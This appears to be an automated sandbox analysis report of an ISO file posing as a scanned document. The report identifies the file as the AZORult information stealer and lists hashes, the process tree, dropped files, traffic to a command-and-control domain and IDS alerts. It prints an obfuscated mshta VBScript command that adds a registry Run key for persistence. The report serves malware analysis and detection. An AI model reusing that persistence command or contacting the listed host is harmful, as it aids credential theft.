File name: | 6d1c1c922da4c1c7dd78bfad3930c257.iso |
Full analysis: | https://app.any.run/tasks/5d50876d-a7a0-4ac8-ba9d-db83a6c40fba |
Verdict: | Malicious activity |
Threats: | AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. |
Analysis date: | December 06, 2018, 07:59:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-iso9660-image |
File info: | ISO 9660 CD-ROM filesystem data '2018-0612_ScannedCopy_0746326589' |
MD5: | 6D1C1C922DA4C1C7DD78BFAD3930C257 |
SHA1: | 3DC542527B4CEA7F4939C815C2D1C5BF2EC66DF4 |
SHA256: | 2358572417EB814C39EDFF9D63C910525756AE82D47438463737937B939DE48E |
SSDEEP: | 6144:cBO7Ef/7Q/11ppBseSxPbqimLKVSQtWkXxQv6tYfoCRjVbd614f0Us+1MsN:cBrg11pjsHdOGWKI6tn |
.iso | | | ISO 9660 CD image (27.6) |
---|---|---|
.atn | | | Photoshop Action (27.1) |
.gmc | | | Game Music Creator Music (6.1) |
VolumeSize: | 540 kB |
---|
VolumeModifyDate: | 2018:12:06 07:47:06.00+01:00 |
---|---|
VolumeCreateDate: | 2018:12:06 07:47:06.00+01:00 |
Software: | PowerISO |
RootDirectoryCreateDate: | 2018:12:06 07:47:06+01:00 |
VolumeBlockSize: | 2048 |
VolumeBlockCount: | 270 |
VolumeName: | 2018-0612_ScannedCopy_0746326589 |
System: | Win32 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2928 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\6d1c1c922da4c1c7dd78bfad3930c257.iso | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2820 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\6d1c1c922da4c1c7dd78bfad3930c257.iso" | C:\Program Files\WinRAR\WinRAR.exe | rundll32.exe | |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
912 | "C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe" | C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe | explorer.exe | |
User: admin Company: SLUBBY Integrity Level: MEDIUM Description: VuRoFenceen Exit code: 0 Version: 5.07.0009 | ||||
3352 | "C:\Windows\System32\mshta.exe" vbscript:Execute(" str1 = ""WScript.Shell"" : str2 = ""Set WshShell = CrXXteObject(str1)"" : str2 = Replace(str2,""XX"",""ea"") : execute str2 : myKey = ""HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SMKLAAS"" : WshShell.RegWrite myKey,""C:\Users\admin\AppData\Local\Temp\Konsumerede.exe"",""REG_SZ"" : window.close") | C:\Windows\System32\mshta.exe | 2018-0612_ScannedCopy_0746326589_pdf.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2372 | "C:\Users\admin\AppData\Local\Temp\Konsumerede.exe" | C:\Users\admin\AppData\Local\Temp\Konsumerede.exe | 2018-0612_ScannedCopy_0746326589_pdf.exe | |
User: admin Company: SLUBBY Integrity Level: MEDIUM Description: VuRoFenceen Version: 5.07.0009 |
PID | Process | Filename | Type | |
---|---|---|---|---|
912 | 2018-0612_ScannedCopy_0746326589_pdf.exe | C:\Users\admin\AppData\Local\VirtualStore\Windows\Borins | text | |
MD5:4206DABEC60D7C778E87FF1744B6D2AC | SHA256:3EB22AA9E19B80AE0902E70D7706EA7667E8BEDBCC6AFF60E1CD657A2C4B41F1 | |||
2820 | WinRAR.exe | C:\Users\admin\Desktop\2018-0612_ScannedCopy_0746326589_pdf.exe | executable | |
MD5:A652EA077490B046CA275037F7D8B7A6 | SHA256:B03F42FB9AEB5BE5221B7123E0E573D74508111A083BF9046ED7219B6CE009E9 | |||
912 | 2018-0612_ScannedCopy_0746326589_pdf.exe | C:\Users\admin\AppData\Local\Temp\~DF102DC8A321753A4C.TMP | binary | |
MD5:778BAE7042E29EC6C44E41F6ED45215A | SHA256:E1F2F139F1F5E02C68E5BACC62EE31BA5FEA196FB4FCB32711DEEA75D1A49E83 | |||
2372 | Konsumerede.exe | C:\Users\admin\AppData\Local\VirtualStore\Windows\Borins | text | |
MD5:1B1E30768CEE423F368AD80A644686A8 | SHA256:E2A414D21824CCB818C059F5EFF83F4AACB4907A1B6F901DA2AC498A77E6E2DF | |||
912 | 2018-0612_ScannedCopy_0746326589_pdf.exe | C:\Users\admin\AppData\Local\Temp\Konsumerede.exe | executable | |
MD5:FF2B4B8DDDA05B06E35CCCDDD1A58FD8 | SHA256:58ADDCDC5B5A228A6ABE89F1B82E562F0CC548A93176CD151C833BF6810F6122 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2372 | Konsumerede.exe | POST | — | 23.229.191.64:80 | http://cpinfo.partnership-international.com/index.php | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2372 | Konsumerede.exe | 23.229.191.64:80 | cpinfo.partnership-international.com | GoDaddy.com, LLC | US | malicious |
Domain | IP | Reputation |
---|---|---|
cpinfo.partnership-international.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2372 | Konsumerede.exe | A Network Trojan was detected | ET TROJAN AZORult Variant.4 Checkin M2 |
2372 | Konsumerede.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult client request |
2372 | Konsumerede.exe | A Network Trojan was detected | MALWARE [PTsecurity] AZORult HTTP Header |